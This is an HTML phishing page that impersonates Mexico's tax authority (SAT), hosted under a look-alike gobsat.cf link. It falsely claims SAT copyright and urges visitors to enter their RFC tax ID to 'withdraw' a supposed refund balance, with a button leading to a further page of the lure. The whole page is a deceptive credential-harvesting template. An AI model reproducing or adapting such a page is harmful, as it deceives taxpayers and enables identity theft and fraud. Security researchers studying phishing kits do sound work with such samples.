<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="generator" content="PURA GENTE DE LATEN">
        <script src="//ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1">
        <meta name="description" content>
        <title>PORTAL SAT</title>
        
<link rel="stylesheet" href="asset/gestiones/./index_files/bootstrap.min.css">
<link rel="stylesheet" href="asset/gestiones/./index_files/bootstrap-grid.min.css">
<link rel="stylesheet" href="asset/gestiones/./index_files/style(3).css">

<link rel="stylesheet" href="asset/gestiones/./index_files/style(4).css">
<link rel="stylesheet" href="asset/gestiones/./index_files/mbr-additional.css" type="text/css">
<style>
    .hro{
        background: #3887ff;
        color: white;
        padding: 90px 0px;
        text-align: center;
        width: 100%;
    }
    .hro-p{
        font-size: 35px;
    }
    .hro-h5{
        font-size: 15px;
        font-weight: bold;
        padding: 15px 0px;
    }
    .pm{
        background: #e0e5ff;
        max-width: 300px;
        border-radius: 12px;
        margin: 0 auto;
        padding: 10px 0px;
    }
    .date{
        border: none;
        border-bottom: 1px solid gray;
        background: transparent;
        Margin-top: 10px;
        Padding:10px 20px;
        font-size: 20px;
        width: 80%;
    }
    .btn-hro button{
        border: none;
        width: 80%;
        border-radius: 15px;
        margin-top: 40px;
        background: #008ce3;
        padding: 15px;
    }
    .btn-hro a{
        text-decoration: none;
        color: white;
        font-weight: bold;
    }
</style>
</head>
<body>
    
    <!-- PRIMER DIV NAV Y LOGO -->
    <section id="top-1" style="display: none;"><a href="https://mobirise.in/">mobirise.com</a> Mobirise v5.3.12</section>
<section class="menu menu1 cid-sDJ2sDA3Gm" once="menu" id="menu1-y">
<nav class="navbar navbar-dropdown navbar-fixed-top navbar-expand-lg">
<div class="container-fluid">
<div class="navbar-brand">
<span class="navbar-logo">
<a href="https://gobsat.cf/index.html">
<img src="logo.png" alt="LOGO" style="height: 3rem;">
</a>
</span>
</div>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
<div class="hamburger">
<span></span>
<span></span>
<span></span>
<span></span>
</div>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav nav-dropdown nav-right" data-app-modern-menu="true"><li class="nav-item"><a class="nav-link link text-white text-primary display-7" href="index.html" aria-expanded="false">Inicio</a></li>
<li class="nav-item"><a class="nav-link link text-white text-primary display-7" href="###">Saldo</a></li>
<div class="wrapper">
<div class="icons-menu">
</div>
</div>
</div>
</div>
</nav>
</section>


<!-- SEGUNDO DIV FOEMULARIO -->
<section class="hro">
    <p class="hro-p">Validación</p>
    <h5 class="hro-h5">Completa tus datos (RFC) para continuar<br> con la validación de tu saldo a favor del <br>SAT</h5>
    <div class="pm">    
            <input type="text " placeholder="RFC" class="date" id="rfc">
            <div class="btn-hro">
                <button><a href="page1.html">Retirar</a></button>
            </div>
    </div>   
</section>
<!--  >Thanks for filling
out the form!</div>
Oops...! some
problem! -->

<!-- FOOTER PIE DEPAGINA -->
<section class="firmm4_footer3 cid-sjZasLTRou" id="footer3-4">
<div class="line"></div>
<div class="container">
<div class="row text-white justify-content-between">
<div class="col-12 col-md-4 col-lg-5">
© Copyright SAT GOB.MX 2023<br></div>
</div>
</div>
</section>
<script src="asset/gestiones/./index_files/bootstrap.min.js"></script>

</body></html>
